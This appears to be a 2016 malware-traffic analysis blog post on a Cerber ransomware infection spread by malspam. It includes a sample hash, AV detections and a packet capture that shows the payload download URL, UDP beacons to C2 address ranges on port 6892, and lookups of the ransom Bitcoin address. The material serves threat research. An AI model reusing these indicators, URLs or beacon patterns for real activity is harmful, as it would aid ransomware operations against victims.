Malspam E-mail Leads to Ransomware Cerber/Zerber Infection 4fv3b5.exe Vector FULL PCAP FILE DOWNLOAD Traffic Sample

Download Attachments

  • 1 pcap muxacc
    Date added: December 16, 2016 8:55 am Added by: admin File size: 121 KB Downloads: 113
SHA256: 2f2b2e30abe71f9a93d6ad7418facf0fcc1323fa0017682f254becf99848e43c
File name: 4fv3b5.exe
Detection ratio: 39 / 56
Analysis date: 2016-12-16 08:39:47 UTC ( 0 minutes ago )
Avira (no cloud) TR/Dropper.btuyq 20161216
BitDefender Trojan.GenericKD.3903694 20161216
Bkav W32.DominasaAST.Trojan 20161215
CAT-QuickHeal TrojanRansom.Zerber 20161216
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
DrWeb Trojan.Encoder.7233 20161216
ESET-NOD32 Win32/Filecoder.Cerber.C 20161216
Emsisoft Trojan.GenericKD.3903694 (B) 20161216
F-Secure Trojan.GenericKD.3903694 20161216
Fortinet W32/Malicious_Behavior.VEX 20161216
GData Trojan.GenericKD.3903694 20161216
K7AntiVirus Trojan ( 004ff8881 ) 20161216
K7GW Trojan ( 004ff8881 ) 20161216
Kaspersky Trojan-Ransom.Win32.Zerber.apnm 20161216
Malwarebytes Ransom.Locky 20161216
McAfee Generic.atf 20161216
McAfee-GW-Edition BehavesLike.Win32.Ransom.dc 20161216
eScan Trojan.GenericKD.3903694 20161216
Microsoft Ransom:Win32/Genasom!rfn 20161216

btc.blockr.io displays a page on how to pay to get your data back and cerber has a speech program which explains your data has been encrypted and you must follow the instructions to get your information back:

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

 

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
E..)w.@……..f.:……sjm….IP………….
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
E..(..@……..fH……P.n.2….P….?……..
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
E..&$…..C….f.1……….hi00889070……..
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
E..&.D….KC…f.1……….hi00889070……..
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
E..&xz………f.1……….hi00889070……..
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
E..&A…..&….f.1……….hi00889070……..
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
E..&
…..]….f.1……….hi00889070……..
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
E..&3<….5G…f.1……….hi00889070……..
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
E..&V……p…f.1……….hi00889070……..
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
E..&o……….f.1……….hi00889070……..
2016-12-16 01:29:16.675334 IP 192.168.1.102.59297 > 15.49.2.8.6892: UDP, length 10
E..&s……….f.1……….hi00889070……..
2016-12-16 01:29:16.675343 IP 192.168.1.102.59297 > 15.49.2.9.6892: UDP, length 10
E..&J……….f.1.     ……..hi00889070……..
2016-12-16 01:29:16.675437 IP 192.168.1.102.59297 > 15.49.2.10.6892: UDP, length 10
E..&/L….92…f.1.
……..hi00889070……..
2016-12-16 01:29:16.675444 IP 192.168.1.102.59297 > 15.49.2.11.6892: UDP, length 10
E..&……Q….f.1……….hi00889070……..
2016-12-16 01:29:16.675595 IP 192.168.1.102.59297 > 15.49.2.12.6892: UDP, length 10
E..&]…..
….f.1……….hi00889070……..
2016-12-16 01:29:16.675610 IP 192.168.1.102.59297 > 15.49.2.13.6892: UDP, length 10
E..&d……a…f.1……….hi00889070……..
2016-12-16 01:29:16.675616 IP 192.168.1.102.59297 > 15.49.2.14.6892: UDP, length 10
E..&.D….g6…f.1……….hi00889070……..
2016-12-16 01:29:16.675651 IP 192.168.1.102.59297 > 15.49.2.15.6892: UDP, length 10
E..&8…../….f.1……….hi00889070……..

2016-12-16 01:29:16.676470 IP 192.168.1.102.59297 > 122.1.13.0.6892: UDP, length 10
E..&:N…..i…fz………r.hi00889070……..
2016-12-16 01:29:16.676519 IP 192.168.1.102.59297 > 122.1.13.1.6892: UDP, length 10
E..&………..fz………r.hi00889070……..
2016-12-16 01:29:16.676602 IP 192.168.1.102.59297 > 122.1.13.2.6892: UDP, length 10
E..&f……….fz………r.hi00889070……..
2016-12-16 01:29:16.676655 IP 192.168.1.102.59297 > 122.1.13.3.6892: UDP, length 10
E..&_x…..<…fz………r.hi00889070……..
2016-12-16 01:29:16.676708 IP 192.168.1.102.59297 > 122.1.13.4.6892: UDP, length 10
E..&.>…..u…fz………r.hi00889070……..
2016-12-16 01:29:16.676714 IP 192.168.1.102.59297 > 122.1.13.5.6892: UDP, length 10
E..&-……….fz………r.hi00889070……..
2016-12-16 01:29:16.676763 IP 192.168.1.102.59297 > 122.1.13.6.6892: UDP, length 10
E..&H……….fz………r.hi00889070……..
2016-12-16 01:29:16.676849 IP 192.168.1.102.59297 > 122.1.13.7.6892: UDP, length 10
E..&q……….fz………r.hi00889070……..
2016-12-16 01:29:16.676901 IP 192.168.1.102.59297 > 122.1.13.8.6892: UDP, length 10
E..&m|…..3…fz………r.hi00889070……..
2016-12-16 01:29:16.676907 IP 192.168.1.102.59297 > 122.1.13.9.6892: UDP, length 10
E..&T……….fz..     ……r.hi00889070……..
2016-12-16 01:29:16.676956 IP 192.168.1.102.59297 > 122.1.13.10.6892: UDP, length 10
E..&1……….fz.
……r.hi00889070……..
2016-12-16 01:29:16.677043 IP 192.168.1.102.59297 > 122.1.13.11.6892: UDP, length 10
E..&.Z…..R…fz………r.hi00889070……..
2016-12-16 01:29:16.677097 IP 192.168.1.102.59297 > 122.1.13.12.6892: UDP, length 10
E..&C……….fz………r.hi00889070……..
2016-12-16 01:29:16.677103 IP 192.168.1.102.59297 > 122.1.13.13.6892: UDP, length 10
E..&z…..w….fz………r.hi00889070……..
2016-12-16 01:29:16.677150 IP 192.168.1.102.59297 > 122.1.13.14.6892: UDP, length 10
E..&………..fz………r.hi00889070……..
2016-12-16 01:29:16.677234 IP 192.168.1.102.59297 > 122.1.13.15.6892: UDP, length 10
E..&&J…..^…fz………r.hi00889070……..
2016-12-16 01:29:16.677288 IP 192.168.1.102.59297 > 122.1.13.16.6892: UDP, length 10
E..&Q……….fz………r.hi00889070……..
2016-12-16 01:29:16.677294 IP 192.168.1.102.59297 > 122.1.13.17.6892: UDP, length 10
E..&h……….fz………r.hi00889070……..
2016-12-16 01:29:16.677391 IP 192.168.1.102.59297 > 122.1.13.18.6892: UDP, length 10
E..&.L…..Y…fz………r.hi00889070……..

2016-12-16 01:29:16.678089 IP 192.168.1.102.59297 > 194.165.16.1.6892: UDP, length 10
E..&o…..7P…f……….’Uhi00889070……..
2016-12-16 01:29:16.678161 IP 192.168.1.102.59297 > 194.165.16.2.6892: UDP, length 10
E..&
……….f……….’Thi00889070……..
2016-12-16 01:29:16.678172 IP 192.168.1.102.59297 > 194.165.16.3.6892: UDP, length 10
E..&3+….s….f……….’Shi00889070……..
2016-12-16 01:29:16.678223 IP 192.168.1.102.59297 > 194.165.16.4.6892: UDP, length 10
E..&xk………f……….’Rhi00889070……..
2016-12-16 01:29:16.678305 IP 192.168.1.102.59297 > 194.165.16.5.6892: UDP, length 10
E..&A…..eT…f……….’Qhi00889070……..
2016-12-16 01:29:16.678357 IP 192.168.1.102.59297 > 194.165.16.6.6892: UDP, length 10
E..&$……y…f……….’Phi00889070……..
2016-12-16 01:29:16.678363 IP 192.168.1.102.59297 > 194.165.16.7.6892: UDP, length 10
E..&.c………f……….’Ohi00889070……..
2016-12-16 01:29:16.678411 IP 192.168.1.102.59297 > 194.165.16.8.6892: UDP, length 10
E..&.1………f……….’Nhi00889070……..
2016-12-16 01:29:16.678497 IP 192.168.1.102.59297 > 194.165.16.9.6892: UDP, length 10
E..&9…..n….f…     ……’Mhi00889070……..
2016-12-16 01:29:16.678550 IP 192.168.1.102.59297 > 194.165.16.10.6892: UDP, length 10
E..&]…..I?…f…
……’Lhi00889070……..
2016-12-16 01:29:16.678556 IP 192.168.1.102.59297 > 194.165.16.11.6892: UDP, length 10
E..&d…..B….f……….’Khi00889070……..
2016-12-16 01:29:16.678653 IP 192.168.1.102.59297 > 194.165.16.12.6892: UDP, length 10
E..&/i….w….f……….’Jhi00889070……..
2016-12-16 01:29:16.678659 IP 192.168.1.102.59297 > 194.165.16.13.6892: UDP, length 10
E..&…….j…f……….’Ihi00889070……..
2016-12-16 01:29:16.678737 IP 192.168.1.102.59297 > 194.165.16.14.6892: UDP, length 10
E..&s…..3C…f……….’Hhi00889070……..
2016-12-16 01:29:16.678791 IP 192.168.1.102.59297 > 194.165.16.15.6892: UDP, length 10
E..&Ju….\….f……….’Ghi00889070……..
2016-12-16 01:29:16.678797 IP 192.168.1.102.59297 > 194.165.16.16.6892: UDP, length 10
E..&=…..ie…f……….’Fhi00889070……..
2016-12-16 01:29:16.678845 IP 192.168.1.102.59297 > 194.165.16.17.6892: UDP, length 10
E..&.m………f……….’Ehi00889070……..
2016-12-16 01:29:16.678930 IP 192.168.1.102.59297 > 194.165.16.18.6892: UDP, length 10
E..&ay….E….f……….’Dhi00889070……..
2016-12-16 01:29:16.678982 IP 192.168.1.102.59297 > 194.165.16.19.6892: UDP, length 10

2016-12-16 01:29:17.684432 IP 192.168.1.102.59297 > 194.165.17.0.6892: UDP, length 10
E..&    ……i…f……….&Vhi00889070……..
2016-12-16 01:29:17.684438 IP 192.168.1.102.59297 > 194.165.17.1.6892: UDP, length 10
E..&2y….s….f……….&Uhi00889070……..
2016-12-16 01:29:17.684476 IP 192.168.1.102.59297 > 194.165.17.2.6892: UDP, length 10
E..&UE….P….f……….&Thi00889070……..
2016-12-16 01:29:17.684598 IP 192.168.1.102.59297 > 194.165.17.3.6892: UDP, length 10
E..&n…..7|…f……….&Shi00889070……..
2016-12-16 01:29:17.684620 IP 192.168.1.102.59297 > 194.165.17.4.6892: UDP, length 10
E..&’…..~-…f……….&Rhi00889070……..
2016-12-16 01:29:17.684626 IP 192.168.1.102.59297 > 194.165.17.5.6892: UDP, length 10
E..& ……….f……….&Qhi00889070……..
2016-12-16 01:29:17.684754 IP 192.168.1.102.59297 > 194.165.17.6.6892: UDP, length 10
E..&{=….*….f……….&Phi00889070……..
2016-12-16 01:29:17.684775 IP 192.168.1.102.59297 > 194.165.17.7.6892: UDP, length 10
E..&D…..a …f……….&Ohi00889070……..
2016-12-16 01:29:17.684801 IP 192.168.1.102.59297 > 194.165.17.8.6892: UDP, length 10
E..&`…..Es…f……….&Nhi00889070……..
2016-12-16 01:29:17.684908 IP 192.168.1.102.59297 > 194.165.17.9.6892: UDP, length 10
E..&gK….>….f…     ……&Mhi00889070……..
2016-12-16 01:29:17.684929 IP 192.168.1.102.59297 > 194.165.17.10.6892: UDP, length 10
E..&………..f…
……&Lhi00889070……..
2016-12-16 01:29:17.684955 IP 192.168.1.102.59297 > 194.165.17.11.6892: UDP, length 10
E..&;…..jR…f……….&Khi00889070……..
2016-12-16 01:29:17.685063 IP 192.168.1.102.59297 > 194.165.17.12.6892: UDP, length 10
E..&r…..3….f……….&Jhi00889070……..
2016-12-16 01:29:17.685085 IP 192.168.1.102.59297 > 194.165.17.13.6892: UDP, length 10
E..&IC….\….f……….&Ihi00889070……..
:

2016-12-16 01:29:30.058704 IP 192.168.1.102.59298 > 15.49.2.0.6892: UDP, length 24
E..4$…..C….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058735 IP 192.168.1.102.59298 > 15.49.2.1.6892: UDP, length 24
E..4.d….K….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058741 IP 192.168.1.102.59298 > 15.49.2.2.6892: UDP, length 24
E..4x……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058852 IP 192.168.1.102.59298 > 15.49.2.3.6892: UDP, length 24
E..4A…..&….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058864 IP 192.168.1.102.59298 > 15.49.2.4.6892: UDP, length 24
E..4.   ….]m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058905 IP 192.168.1.102.59298 > 15.49.2.5.6892: UDP, length 24
E..43\….5….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059018 IP 192.168.1.102.59298 > 15.49.2.6.6892: UDP, length 24
E..4V2…..B…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
E..4p……m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
E..4s……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
E..4J……….f.1.     ….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
E..4/l….9….f.1.
….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
E..4……Q….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24
E..4^…..
c…f.1……. 2.2107cd482fd40088950110cf

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)
E..I………..fKKKK…5.5~R.+………..ftoxmpdipwobp4qy.joa688.top…..

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
E..;………..fKKKK.(.5.’…m………..btc.blockr.io…..
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4c.@…9-…f…….P………. .w……………
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
E..(c.@…98…f…….P….$.-IP………….
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
E..&c.@…89…f…….P….$.-IP…>…GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
E..@c.@…8….f…….P….$…P…!…GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io
Connection: Keep-Alive

 

2016-12-16 01:33:53.309648 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 544, win 948, length 0

 

The data pulled from the btc.blockr.io link :

 

{"status":"success","data":{"address":"17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt","limit_txs":200,"nb_txs":145,"nb_txs_displayed":145,"txs":[{"tx":"5712191df3ff261e492696e00078be2b582bbdb94af2c35d952237432404b4b3","time_utc":"2016-12-16T00:41:46Z","confirmations":43,"amount":0.45874077,"amount_multisig":0},{"tx":"60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea","time_utc":"2016-12-16T00:17:25Z","confirmations":44,"amount":-0.46037778,"amount_multisig":0},{"tx":"9ed8fab7df73a40f41616368ae8c4630128b9acc3117520da03908702a5c7918","time_utc":"2016-12-15T23:17:13Z","confirmations":52,"amount":0.46037778,"amount_multisig":0},{"tx":"f1672adba2f8245faf6568462bb38b47ee436156803646f8437e203e59cb435c","time_utc":"2016-12-15T23:03:28Z","confirmations":53,"amount":-0.46197889,"amount_multisig":0},{"tx":"3c85a60667beacfe81aa52b323a88f037127716f5f8e421b6d9d371ac11c9bd1","time_utc":"2016-12-14T22:05:11Z","confirmations":184,"amount":0.46197889,"amount_multisig":0},{"tx":"eeb2704655f9c41690bfd8acf760a4a4f1f3f503eebe60cedc6065748256a6f7","time_utc":"2016-12-14T21:56:23Z","confirmations":185,"amount":-0.46369457,"amount_multisig":0},{"tx":"3305874b3e467e9d5412fed58c59f71966464ba6098b028eeec9587894d6a3f2","time_utc":"2016-12-14T09:44:57Z","confirmations":260,"amount":0.46369457,"amount_multisig":0},{"tx":"2829831beec7140aa1f89305c0e93ee181e6aa5b1fd146b739191263e137dca5","time_utc":"2016-12-14T09:17:29Z","confirmations":261,"amount":-0.46503174,"amount_multisig":0},{"tx":"d408af4439c865d89571de27c348fb2593fcf579773971ded586caa4a00d476f","time_utc":"2016-12-13T13:41:22Z","confirmations":377,"amount":0.46503174,"amount_multisig":0},{"tx":"149170830550ec8c023ab3e3a41c6865dcb55d2c86a6de51d0acb5ed7ff30463","time_utc":"2016-12-13T13:35:55Z","confirmations":378,"amount":-0.46647336,"amount_multisig":0},{"tx":"95b41dd061f3b37dd4a47444cc644cf03fcd6cc9b8e4ab7b7b8464729ed0f659","time_utc":"2016-12-13T12:22:43Z","confirmations":388,"amount":0.46647336,"amount_multisig":0},{"tx":"d6452ee98ef8b5007dc22024a9408dd10f7f6ecd5b5b733850e005b6fb1c97f6"


Leave a Reply